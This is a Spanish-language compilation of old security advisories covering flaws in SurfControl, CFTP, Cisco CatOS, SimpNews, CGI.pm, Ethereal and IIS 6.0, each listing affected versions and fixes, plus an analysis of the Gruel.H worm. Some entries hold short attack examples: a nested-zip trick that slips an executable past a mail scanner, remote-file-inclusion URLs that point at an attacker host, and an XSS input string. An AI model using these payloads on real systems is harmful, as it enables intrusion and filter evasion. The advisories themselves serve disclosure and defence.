RedHat Linux 7.3 i386
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0
S.u.S.E. Linux 8.0 i386
SCO eDesktop 2.4
SCO eServer 2.3.1
SGI IRIX 6.5
SGI IRIX 6.5.1
SGI IRIX 6.5.10
SGI IRIX 6.5.11
SGI IRIX 6.5.12
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12 m
SGI IRIX 6.5.13
SGI IRIX 6.5.13 f
SGI IRIX 6.5.13 m
SGI IRIX 6.5.14
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14 m
SGI IRIX 6.5.15
SGI IRIX 6.5.16
SGI IRIX 6.5.17
SGI IRIX 6.5.18
SGI IRIX 6.5.19
SGI IRIX 6.5.2
SGI IRIX 6.5.3
SGI IRIX 6.5.4
SGI IRIX 6.5.5
SGI IRIX 6.5.6
SGI IRIX 6.5.7
SGI IRIX 6.5.8
SGI IRIX 6.5.9
Slackware Linux 8.0
Slackware Linux 8.1
Sun Cobalt Control Station 4100CS
Sun Cobalt ManageRaQ v2 3599BD
Sun Cobalt Qube3 4000WG
Sun Cobalt RaQ 3
Sun Cobalt RaQ 4 3001R
Sun Cobalt RaQ 550
Sun Cobalt RaQ XTR 3500R
Sun Solaris 7.0
Sun Solaris 8.0
Sun Solaris 8.0 _x86
Sun Solaris 9.0
Trustix Secure Linux 1.1
Trustix Secure Linux 1.2
Trustix Secure Linux 1.5
Unisphere Networks SDX-300 2.0.3

Solución:

La solución a este problema es hacer un update a la version 1.3.28
desde la siguiente pagina:

http://httpd.apache.org/download.cgi

——————————————————————-

6)

—————————————————————
-Vulnerabilidad en "SurfControl Filter for SMTP"-
—————————————————————

Problema: "Permite pasar el escaneo y permite un denial of service"

La vulnerabilidad es remota y permite a un atacante pasar el escaneo y producir un
denial of service.

Ejemplos:

para pasar el filtro crear un .zip con:

attach.zip - dummy_folder - a.zip - junk.txt
- b.zip - junk.txt
- c.zip - junk.txt
- d.zip - junk.txt
- e.zip - junk.txt
- f.zip - junk.txt
- g.zip - junk.txt
- h.zip - junk.txt
- i.zip - junk.txt
- j.zip - junk.txt
- k.zip - junk.txt
- m.zip - junk.txt
- n.zip - junk.txt
- o.zip - junk.txt
- p.zip - junk.txt
- z.zip - sneaky.exe << Passes thru!

el ultimo z.zip no va a ser escaneado

Versiones vulnerables:

SurfControl Email Filter for SMTP 4.6

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————————-

7)

—————————————-
-Vulnerabilidad en "CFTP"-
—————————————-

Problema: "Buffer Overflow"

La vulnerabilidad es local y permite a un atacante mediante un buffer overflow producir
un segmentation fault

En esta parte del codigo se encuentra la vulnerabilidad:

En el main.c :

/* XXX */ readrc(&user, &pass, &host, &port, &wdir, check_alias);

if (ftp_proto == 0) {
if (user == NULL) {
read_netrc(host, &user, &pass, &wdir);………ponit
}
……………………………………………………………
read_netrc(char *host, char **user, char **pass, char **wdir)
{
FILE *f;
char b[1024], *home, *p, *q;
int match, init, end, userp;
struct stat stat;

if ((home=getenv("HOME")) == NULL)………….point
home = "";
sprintf(b, "%s/.netrc", home);……………….point

Podemos ver que el HOME no esta limitado permitiendo un overflow en la variable "b"

Versiones vulnerables:

Dillo cftp 0.12

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————————-

————————————————–
-Denial of service en "Cisco CatOS"-
————————————————–

Problema:

La vulnerabilidad es remota y permite que un atacante logre un "denial of service"

Versiones vulnerables:

Cisco CatOS 5.4
Cisco CatOS 5.5
Cisco CatOS 5.5 13A
Cisco CatOS 6.1
Cisco CatOS 6.1(2)
Cisco CatOS 7.3
Cisco CatOS 7.4
Cisco Catalyst 4000 4.5(10)
Cisco Catalyst 4000 4.5(2)
Cisco Catalyst 4000 4.5(3)
Cisco Catalyst 4000 4.5(4)
Cisco Catalyst 4000 4.5(4b)
Cisco Catalyst 4000 4.5(5)
Cisco Catalyst 4000 4.5(6)
Cisco Catalyst 4000 4.5(7)
Cisco Catalyst 4000 4.5(8)
Cisco Catalyst 4000 4.5(9)
Cisco Catalyst 4000 5.1
Cisco Catalyst 4000 5.1(1)
Cisco Catalyst 4000 5.1(1a)
Cisco Catalyst 4000 5.1(2a)
Cisco Catalyst 4000 5.2
Cisco Catalyst 4000 5.2(1)
Cisco Catalyst 4000 5.2(1a)
Cisco Catalyst 4000 5.2(2)
Cisco Catalyst 4000 5.2(4)
Cisco Catalyst 4000 5.2(5)
Cisco Catalyst 4000 5.2(6)
Cisco Catalyst 4000 5.2(7)
Cisco Catalyst 4000 5.4
Cisco Catalyst 4000 5.4(1)
Cisco Catalyst 4000 5.4(2)
Cisco Catalyst 4000 5.4(3)
Cisco Catalyst 4000 5.4.1
Cisco Catalyst 4000 5.5
Cisco Catalyst 4000 5.5 (13)
Cisco Catalyst 4000 5.5(1)
Cisco Catalyst 4000 5.5(2)
Cisco Catalyst 4000 5.5(3)
Cisco Catalyst 4000 5.5(4)
Cisco Catalyst 4000 5.5(4b)
Cisco Catalyst 4000 5.5.5
Cisco Catalyst 4000 6.1(1)
Cisco Catalyst 4000 6.1(1a)
Cisco Catalyst 4000 6.1(1b)
Cisco Catalyst 4000 6.1(1c)
Cisco Catalyst 4000 6.3 (4)
Cisco Catalyst 4000 6.3.5
Cisco Catalyst 4000 7.1
Cisco Catalyst 4000 7.1.2
Cisco Catalyst 4000 7.5(1)
Cisco Catalyst 5000 4.5(10)
Cisco Catalyst 5000 4.5(11)
Cisco Catalyst 5000 4.5(12)
Cisco Catalyst 5000 4.5(13a)
Cisco Catalyst 5000 4.5(2)
Cisco Catalyst 5000 4.5(3)
Cisco Catalyst 5000 4.5(4)
Cisco Catalyst 5000 4.5(4b)
Cisco Catalyst 5000 4.5(5)
Cisco Catalyst 5000 4.5(6)
Cisco Catalyst 5000 4.5(7)
Cisco Catalyst 5000 4.5(8)
Cisco Catalyst 5000 4.5(9)
Cisco Catalyst 5000 5.1
Cisco Catalyst 5000 5.1(1)
Cisco Catalyst 5000 5.1(2a)
Cisco Catalyst 5000 5.2
Cisco Catalyst 5000 5.2(1)
Cisco Catalyst 5000 5.2(2)
Cisco Catalyst 5000 5.2(3)
Cisco Catalyst 5000 5.2(4)
Cisco Catalyst 5000 5.4(1)
Cisco Catalyst 5000 5.4(2)
Cisco Catalyst 5000 5.4(3)
Cisco Catalyst 5000 5.4(4)
Cisco Catalyst 5000 5.4.1
Cisco Catalyst 5000 5.5 (13)
Cisco Catalyst 5000 5.5(1)
Cisco Catalyst 5000 5.5(2)
Cisco Catalyst 5000 5.5(3)
Cisco Catalyst 5000 5.5(4)
Cisco Catalyst 5000 5.5(4b)
Cisco Catalyst 5000 5.5(6)
Cisco Catalyst 5000 5.5(7)
Cisco Catalyst 5000 6.1(1)
Cisco Catalyst 5000 6.1(1a)
Cisco Catalyst 5000 6.1(1b)
Cisco Catalyst 5000 6.1(1c)
Cisco Catalyst 5000 6.1(2)
Cisco Catalyst 5000 6.1(3)
Cisco Catalyst 5000 6.3 (4)
Cisco Catalyst 6000 5.3(1)CSX
Cisco Catalyst 6000 5.3(1a)CSX
Cisco Catalyst 6000 5.3(2)CSX
Cisco Catalyst 6000 5.3(3)CSX
Cisco Catalyst 6000 5.3(4)CSX
Cisco Catalyst 6000 5.3(5)CSX
Cisco Catalyst 6000 5.3(5a)CSX
Cisco Catalyst 6000 5.3(6)CSX
Cisco Catalyst 6000 5.4
Cisco Catalyst 6000 5.4(1)
Cisco Catalyst 6000 5.4(2)
Cisco Catalyst 6000 5.4(3)
Cisco Catalyst 6000 5.4(4)
Cisco Catalyst 6000 5.4.1
Cisco Catalyst 6000 5.5
Cisco Catalyst 6000 5.5 (13)
Cisco Catalyst 6000 5.5(1)
Cisco Catalyst 6000 5.5(2)
Cisco Catalyst 6000 5.5(3)
Cisco Catalyst 6000 5.5(4)
Cisco Catalyst 6000 5.5(4a)
Cisco Catalyst 6000 5.5(4b)
Cisco Catalyst 6000 6.1(1)
Cisco Catalyst 6000 6.1(1a)
Cisco Catalyst 6000 6.1(1b)
Cisco Catalyst 6000 6.1(1c)
Cisco Catalyst 6000 6.1(2.13)
Cisco Catalyst 6000 6.2(0.110)
Cisco Catalyst 6000 6.2(0.111)
Cisco Catalyst 6000 6.3 (4)
Cisco Catalyst 6000 6.3(0.7)PAN
Cisco Catalyst 6000 7.1
Cisco Catalyst 6000 7.1 (2)
Cisco Catalyst 6000 7.5(1)
Cisco Catalyst 6000 7.6 (1)

Solución:

Cisco ha sacado de inmediato el fix, la pagina para conseguirlo es:

http://www.cisco.com/public/sw-center/index.shtml

——————————————————————-

9)

——————————————–
-Vulnerabilidad en "SimpNews"-
——————————————–

Problema: "Vulnerabilidad de incluir archivos"

La vulnerabilidad es remota y permite a un atacante la ejecución de codigo
en el sistema vulnerable.

La vulnerabilidad se encuentra en los archivos "eventcal2.php" y "eventscroller.php"
y en la variable "$path_simpnews".

Ejemplos:

http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/
con
http://[attacker]/config.php
http://[attacker]/functions.php
http://[attacker]/includes/has_entries.inc
o
http://[target]/eventscroller.php?path_simpnews=http://[attacker]/
con
http://[attacker]/config.php
http://[attacker]/functions.php

Versiones vulnerables:

Bosch IT-Consulting SimpNews 2.01
Bosch IT-Consulting SimpNews 2.13

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————————-

10)

—————————————————————
-Vulnerabilidad en RAV Antivirus Online Scanning-
—————————————————————

Problema: "ActiveX Buffer Overflow"

La vulnerabilidad es remota y permite a un atacante causar un buffer overflow.

El ActiveX vulnerable es el ravonline.dll y el problema se aloja en la función browseForFolder()
cuando se pide una petición muy larga produciria un overflow.

Versiones vulnerables:

RAV RAV AntiVirus Online Virus Scan .

Solución:

Borrar la ActiveX(ravonline.dll) en "Downloaded Program Files" en el directorio de Windows.

Esta es al solución mas rapida ya que no ha salido otra hasta el momento.

——————————————————————-

11)

—————————————-
-Vulnerabilidad en CGI.pm-
—————————————-

Problema: "Cross-site Scripting"

La vulnerabilidad es remota y permite a un atacante la ejecución de comandos.

Ejemplo:

http://host/script.pl?">some%20text<!–%20

Versiones vulnerables:

stein.cshl.org CGI.pm 2.88

Solución:

VULNERABILITY SOLUTION

Agregar en la linea 1537 esto:

$action =~ s/\"/\%22/g;

——————————————————————-

12)

——————————————–
-Vulnerabilidad en "Ethereal"-
——————————————–

Problema: "Multiples Buffer Overflow y Integer Overflow"

La vulnerabilidad es remota y permite a un atacante provocar un crash o
ejecutar arbitrariamente codigo.

Serios problemas son causados por usar tvb_get_nstringz() y tvb_get_nstringz0()
ya que es una manera muy insegura.

Versiones vulnerables:

Compaq Tru64 5.0
Conectiva CLEE 1.0
Conectiva Linux 6
Conectiva Linux 7.0
Conectiva Linux 8.0
Debian Linux 2.2
Debian Linux 2.2 68k
Debian Linux 2.2 IA-32
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia-32
Debian Linux 3.0 ia-64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
Ethereal Group Ethereal 0.8
Ethereal Group Ethereal 0.8.18
Ethereal Group Ethereal 0.9 .0
Ethereal Group Ethereal 0.9.1
Ethereal Group Ethereal 0.9.10
Ethereal Group Ethereal 0.9.11
Ethereal Group Ethereal 0.9.2
Ethereal Group Ethereal 0.9.3
Ethereal Group Ethereal 0.9.4
Ethereal Group Ethereal 0.9.5
Ethereal Group Ethereal 0.9.6
Ethereal Group Ethereal 0.9.7
Ethereal Group Ethereal 0.9.8
Ethereal Group Ethereal 0.9.9
HP HP-UX 11.0
IBM AIX 5.1
Linux Linux kernel 2.4
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 PPC
Microsoft Windows 2000 Professional .
Microsoft Windows 95 .
Microsoft Windows 98 .
Microsoft Windows 98 Se
Microsoft Windows ME .
Microsoft Windows NT Workstation 4.0
Microsoft Windows XP .
NetBSD NetBSD 1.5
OpenBSD OpenSSH 3.0
RedHat Advanced Workstation 2.1
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux WS 2.1
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2
RedHat Linux 7.2 alpha
RedHat Linux 7.2 i386
RedHat Linux 7.3
RedHat Linux 7.3 i386
RedHat Linux 8.0
RedHat Linux 8.0 I386
RedHat Linux 9.0 i386
SCO UnixWare 7.0
SGI IRIX 6
Sun Solaris 8.0
Terra Soft Solutions Yellow Dog Linux 3.0

Solución:

Hacer un upgrade a la version "ethereal-0.9.12" la cual la puede conseguir en:

http://www.ethereal.com/distribution/ethereal-0.9.12.tar.gz

o consultar en estas direcciones para updates en especifico:

ftp://ul.conectiva.com.br/updates/1.0/

http://security.debian.org/pool/updates/main/e/ethereal/

http://www.mandrakesecure.net/en/ftp.php

ftp://updates.redhat.com/

ftp://ftp.yellowdoglinux.com/pub/yellowdog/updates/yellowdog-3.0/

——————————————————————-

En estos últimos días hemos estado viendo que aparecían diversas vulnerabilidades que afectad a la interfaz web de administración de IIS 6.0. Las vulnerabilidades son las siguientes:

1. El administrador puede usar la administración mediante web sin necesidad de autentificarse después de un reinicio del sistema.

2. Existe cierta “anarkía” en el uso de ID “__SAPageKey”, que permite a un atacante hacer peticiones URL directamente sin necesidad de inicio de sesión.

3. Debido a otro fallo en “__SAPageKey”, el atacante puede hacer una petición directamente a /admin/default.asp, /admin/users/users.asp, /admin/tasks.as, etc, y obtener un nuevo identificador de sesión para continuar con su ataque.

4. Cross Site Scripting en la administración web que permite a un atacante la inserción de código.

5. La contraseña de administración puede ser cambiada sin una autentificación apropiada.

Estas vulnerabilidades pueden comprometer peligrosamente la seguridad del sistema. Microsoft aún no ha sacado actualización para estos problemas, así que recomendamos si es posible desactivar la administración remota, y administrar de forma local en tanto no salga un actualización que corrija estas vulnerabilidades.

Más información: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/iis6/index.html

Ha aparecido una vulnerabilidad en los productos Sun Linux y Sun Cobalt, las versiones afectadas son las siguientes:

- Sun Cobalt CacheRaQ4 3100CR
- Sun Cobalt Control Station SCCS
- Sun Cobalt Qube3 .
- Sun Cobalt RaQ XTR .
- Sun Cobalt RaQ4 .
- Sun Cobalt RaQ550 .
- Sun Linux 5.0

La vulnerabilidad es debida a un fallo en la función ptrace(), una llamada al sistema de los procesos usada para controlar y monitorizar la ejecución de un proceso hijo.

Las actualizaciones para esta vulnerabilidad pueden ser encontradas en el portal de parches de Sun: http://sunsolve.sun.com

Más información en http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F52081&zone_32=category%3Asecurity

Gruel.H es un gusano destructivo de alta propagación masiva a través de un mensaje de correo con el archivo anexado Rundll32.exe simulando ser una herramienta de Norton Antivirus que protegería de un supuesto virus de Internet.

Se difunde además vía la red Kazaa con un archivo que aparenta ser un video de la película Matrix Reloaded 2.

El gusano borra archivos del sistema y carpetas de %System% deshabilitando al sistema operativo.

Es un PE (Portable Ejecutable) e infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003, está desarrollado y compilado en Visual Basic 6.0, tiene 100 KB de extensión.

Haciendo uso de las funciones de las librerías MAPI (Messaging Application Programming Interface) se auto-envía a todos los buzones de correo de la Libreta de Direcciones de MS Outlook.

Al ejecutar el archivo el gusano muestra una falsa caja de diálogo de Error de Windows XP y al hacer click en cualquiera de sus dos botones se muestran en pantalla otras cajas de diálogo.

En el caso de Windows XP, el sistema quedará inaccesible y en Windows 2000 la unidad C: será ocultada. Muestra el siguiente mensaje de error:

“Your computer now is mine, Why? Because I didn’t had nothing to do and I thought, why not make the evil? Remember NOW YOUR PC IS IN MY POWER Windows Sucks! I can’t stand it anymore! Windows has always sucked. Wake up people! It’s a scam! You don’t need a faster computer. You need a better operating system. Microsoft continuingly makes money by selling you the latest and greatest Windows. The latest Windows version is always the most inefficient yet, slowing down your fast computer. Also, now you have to upgrade all your other software too because different Windows versions are not compatible with each other! A hidden cost not mentioned at all. It’s part of the scam. Capitalism Sucks!, Communism Sucks. KILLERGUATE.”

[ . . . ]

Al siguiente re-inicio el gusano borra los siguientes archivos:

· C:\autoexec.bat
· C:\config.sys
· C:\WINNT\system32\ntoskrnl.exe
· C:\WINNT\system32\command.com
· C:\WINNT\regedit.exe
· C:\Windows\system32\ntoskrnl.exe
· C:\Windows\system32\command.com
· C:\Windows\regedit.exe
· C:\WINNT\system32\*.exe
· C:\WINNT\system32\*.com
· C:\WINNT\system32\*.dll
· C:\WINNT\system32\*.ocx
· C:\Windows\system32\*.dll
· C:\Windows\system32\*.ocx
· C:\Windows\system32\*.exe
· C:\Windows\system32\*.com
· C:\WINNT\Archivos de Programa\Norton AntiVirus\Navw32.exe
· C:\Windows\Archivos de Programa\Norton AntiVirus\Navw32.exe

También borra estas carpetas:

· C:\WINNT\system
· C:\Windows\system
· C:\WINNT\system32
· C:\Windows\system32
· C:\Inetpub\wwwroot

Cambia el título de la barra de Internet Explorer al generar la siguiente llave:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“Window Title” = “kIlLeRgUaTe 1.03, I mAke ThIs vIrUs BeCaUsE I dOn’T hAvE NoThInG tO dO!!”

Deshabilita las funciones SEARCH y RUN del sistema.

Para infectar vía Kazaa, el gusano se auto-copia con el nombre del archivo Matrix Reloaded 2 avi.exe en las carpetas:

C:\Windows\Archivos de Programa\Kazaa\My Shared Folder
C:\WINNT\Archivos de Programa\Kazaa\My Shared Folder
Los payloads de este gusano son:

- Se propaga masivamente en mensajes de correo, haciendo uso de la Libreta de Direcciones de MS Outlook.
- El mensaje simula contener un archivo de Norton Antivirus, que protege de un supuesto virus de Internet.
- Infecta a través de la red Kazaa.
- Muestra falsos mensajes de error.
- Windows XP quedará inaccesible y la unidad C: de Windows 2000 será ocultada.
- Se ejecuta automáticamente cada vez que se abren archivos de diversas extensiones.
- Cambia el título de la barra del Internet Explorer.
- Abre la bandeja de la lectora de CD-ROM.
- Deshabilita las funciones de Search y Run.
- Borra archivos y carpetas del sistema.
- Será necesario re-instalar Windows.

Denominaciones: W32/Gruel.H@mm, I.worm.Gruel.h@mm

Artículo tomado de: http://www.perantivirus.com/sosvirus/virufamo/gruelh.htm